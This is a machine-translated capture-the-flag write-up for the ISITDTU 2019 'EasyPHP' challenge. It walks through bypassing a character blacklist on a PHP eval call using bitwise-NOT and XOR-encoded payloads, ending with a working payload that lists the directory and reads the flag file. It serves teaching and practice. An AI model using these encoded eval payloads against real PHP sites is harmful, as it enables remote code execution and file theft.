[ISITDTU 2019]EasyPHP

I have been fishing recently , I don't know what to do every day , I can't calm down to do the problem , I did this problem today , Finally, the understanding of the topic is ambiguous , So write it down wp To reinforce the knowledge points , Put no alphanumeric rce Consolidate the content of , This topic involves a small point , To learn more about bypass poses, read p God's article .
Turn on the target , See the source code ：

<?phphighlight_file(__FILE__);$_ = @$_GET['_'];if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )    die('rosé will not do it');if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )    die('you are so close, omg');eval($_);?>

The source code means to bypass two if, Last eval Carry out orders

The first regular match ：
\x00- 0-9 matching \x00 To space (\x20), Numbers 0-9
'"`$&.,|[{_defgops\x7F matching '"`$&.,|[{_defgops These characters and DEL(\x7F) character The second regular match ： count_chars() Function returns information about the characters used in a string （ Returns a string , Contains all the different characters used in the parameter （ Pattern 3）） in other words , Different characters cannot exceed 13 individual First try the built-in functions that satisfy the regularity with the following script , After checking, it is found that there is no available function <?php
$array=get_defined_functions();// Returns all built-in defined functions
foreach($array['internal'] as $arr){
if ( preg_match('/[\x00- 0-9\'"\`$&.,|[{_defgops\x7F]+/i', $arr) ) continue;
if ( strlen(count_chars(strtolower($arr), 0x3)) > 0xd ) continue;
print($arr.'<br/>');
}
?> Here try to negate or XOR around , Try it first phpinfo() php -r "echo urlencode(~'phpinfo');" From the information obtained, we can see that most functions are filtered , Here we use print_r(scandir(.)) To read the directory (~%8F%8D%96%91%8B%A0%8D)((~%8C%9C%9E%91%9B%96%8D)(~%D1)); The second match cannot be bypassed , To facilitate replacement, bypass , Use XOR %ff Form combined with substitution bypasses print_r(scandir(.)) by ((%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF))); I have no patience to do this Read the article of the boss directly [ISITDTU 2019]EasyPHP_fmyyy1 The blog of -CSDN Blog First test the length locally <?php
$_ = $_GET['_'];
echo strlen(count_chars($_,3)); It's found that the length is 16, Need to find ways to reduce 3 individual Directly use the article method to replace str = 'acdips'
target = 'ntr'
for m in target:
for a in str:
for b in str:
for c in str:
if ord(a)^ord(b)^ord(c) == ord(m):
print("{} = {}^{}^{}".format(m,a,b,c)) n = c^d^i t = c^d^s r = a^c^p utilize print_r To illustrate ：(%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF) The corresponding ntr Replace with ： (%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF) Replace the last payload by ((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF))); The test length was found to be 13, Meet the requirements . payload by ?_=((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF))); Find out flag At the end of the array , use readfile(end(scandir(.))) To read , The construction method is the same as above Last payload by ： ?_=((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%9A%9E%9B)^(%FF%99%FF)^(%FF%96%FF)^(%FF%FF%FF))(((%8D%9E%9E%9E%9B%96%8D)^(%9A%9B%FF%99%FF%FF%FF)^(%9B%99%FF%96%FF%FF%FF)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF))); $(function() { setTimeout(function () { var mathcodeList = document.querySelectorAll('.htmledit_views img.mathcode'); if (mathcodeList.length > 0) { var testImg = new Image(); testImg.onerror = function () { mathcodeList.forEach(function (item) { $(item).before('\(' + item.alt + '\)'); $(item).remove(); }) MathJax.Hub.Queue(["Typeset",MathJax.Hub]); } testImg.src = mathcodeList[0].src; } }, 1000) }) ahik1 Focus on
author ：ahik1

Game programming , A game development favorite ~

If the picture is not displayed for a long time , Please use Chrome Kernel browser .